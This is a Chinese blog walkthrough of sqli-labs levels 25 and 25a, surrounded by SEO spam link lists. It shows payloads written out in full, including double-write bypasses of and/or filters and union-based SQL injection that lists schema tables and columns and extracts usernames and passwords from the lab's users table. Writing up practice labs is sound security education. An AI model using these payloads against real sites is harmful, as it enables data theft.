当前位置: 首页 > news >正文

做猎头要用的网站知乎wordpress图文教程

news 2026/4/24 22:34:20
做猎头要用的网站知乎,wordpress图文教程,开发商延期交房怎么申请退房,安康免费做网站目录 第二十五关 1、判断注入点 2、判断数据库 3、判断表名 4、判断字段名 5、获取数据库的数据 第二十五a关 1、判断注入点 2、判断数据库 第二十五关 知识点#xff1a;绕过and、or过滤 思路#xff1a; 通过分析源码和页面#xff0c;我们可以知道对and和or 进…目录 第二十五关 1、判断注入点 2、判断数据库 3、判断表名 4、判断字段名 5、获取数据库的数据 第二十五a关 1、判断注入点 2、判断数据库 第二十五关 知识点绕过and、or过滤 思路 通过分析源码和页面我们可以知道对and和or 进行了过滤我们需要绕过这些过滤常见的绕过方式有大小写双写编码等 1、判断注入点 首先我们输入正常的数据看看回显 接着加入单引号 http://127.0.0.1:3306/Less-25/?id1 数据库语句报错说明存在闭合问题我们加入注释符  http://127.0.0.1:3306/Less-25/?id1 -- 数据正常回显说明这里的闭合方向正确存在单引号的闭合问题 这里可以看到输入and、or被过滤掉了 尝试一下大小写混合发现也是不行 这里因为源码对大小写进行忽略 /i的作用就是忽略大小写 我们尝试使用双写绕过 http://127.0.0.1:3306/Less-25/?id1 anandd 11 -- http://127.0.0.1:3306/Less-25/?id1 oorr 11 -- 说明双写可以绕过 判断字段数 http://127.0.0.1:3306/Less-25/?id1 oorrder by 3-- http://127.0.0.1:3306/Less-25/?id1 oorrder by 4 -- 说明当前的表的字段数有三个 判断数据回显位置 2、判断数据库 http://127.0.0.1:3306/Less-25/?id-1 union select 1,2,database() -- 3、判断表名 使用group_concat()函数 http://127.0.0.1:3306/Less-25/?id-1 union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schemasecurity -- 4、判断字段名 以users表为例 http://127.0.0.1:3306/Less-25/?id-1 union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_schemasecurity  anandd table_nameusers-- 5、获取数据库的数据 使用concat_ws()函数 http://127.0.0.1:3306/Less-25/?id-1 union select 1,2,concat_ws(,,id,username,passwoorrd) from security.users limit 0,1 -- 通过修改limit的值可以获取全部数据 第二十五a关 知识点绕过and、or过滤 思路 通过分析源码可以知道跟25关一样过滤了and、or 且不区分大小写所以用双写绕过而且没有显示报错信息 1、判断注入点 首先我们输入正常的数据看看回显 http://127.0.0.1:3306/Less-25a/?id1 加入单引号’ http://127.0.0.1:3306/Less-25a/?id1 报错了但没有显示具体的报错原因加上注入符 -- http://127.0.0.1:3306/Less-25a/?id1 -- 这里还是报错以为是闭合方式不对把   ) ) 都试了一遍还是不对结果看源码才发现是数值型注入忽略还有这个类型把自己给蠢笑了哈哈哈 http://127.0.0.1:3306/Less-25a/?id1 and 11 -- 这里发现and、or都被过滤跟上面的思路一样尝试大小写双写结果发现双写可以绕过 http://127.0.0.1:3306/Less-25a/?id1 anandd 11 -- 将11改成12 http://127.0.0.1:3306/Less-25a/?id1 anandd 12 -- 数据没有回显但没有报错这也说明当前是数值型的注入 判断字段数 http://127.0.0.1:3306/Less-25a/?id1 oorrder by 3 -- http://127.0.0.1:3306/Less-25a/?id1 oorrder by 4 -- 说明当前表的字段有3个 判断回显位置 http://127.0.0.1:3306/Less-25a/?id1 anandd 12 union select 1,2,3-- 或者 http://127.0.0.1:3306/Less-25a/?id-1 union select 1,2,3-- 2、判断数据库 http://127.0.0.1:3306/Less-25a/?id-1 union select 1,2,database()-- 接下来的步骤就跟上面的差不多了可以才参考上面的 这篇文章就先写到这里了哪里不懂的或者不好的欢迎指出
http://www.hkea.cn/news/14400441/

相关文章:

  • 哪一个网站可以做专利检索报告抚州市城乡建设局网站
  • 网页制作与网站建设06627wp怎么做双语网站
  • 如何做淘宝客有没有免费的网站八年级信息做网站所用软件
  • 建设通是什么网站运动品牌网站开发题目来源
  • 谷歌网站站长指南免费下载app软件下载安装到手机
  • 拨付网站建设经费的请示宁波网络营销推广开发中心
  • 广州专业的网站推广工具住建综合管理平台
  • 龙岩市城乡建设局网站进不去怎么给网站做短信
  • 揭阳做网站设计高端科技产品网站建设
  • 买什么就开什么网站吗公司请人做的网站打不开
  • h5网站开发公司网址平台有哪些
  • 中国移动网站备案管理系统wordpress 安全性
  • 建博会广州网站网站建设与维护项目六
  • 外贸营销网站建设公司做网站推广销售产品
  • 网站备案号示例惠州百度搜索排名优化
  • wap网站制作方案建设网站需要哪些条件
  • 怎么修复网站死链建设集团有限公司英文
  • 珠海市住房城乡建设局网站wordpress登陆评论
  • 宣传网站制作哪家质量好网站推广淘宝联盟怎么做
  • 企业网站管理系统安装教程公司邮箱注册申请
  • 四川网站推广优化帝国cms网站名称
  • 免费域名怎么做网站智能云建站
  • 做论坛网站数据库需多大wordpress彻底禁用google
  • 网站开发宣传语绵阳网站建设
  • 免费的个人简历模板网站wordpress 安装七牛
  • 建设部网站首页督办案件网站怎么做成app
  • 个人网站如何建立中企动力做网站 知乎
  • 门户网站标题居中加大后端开发技术
  • 网站界面设计pswordpress 页面 父级
  • 网站架构发展历程的思考和心得体会心理咨询网站开发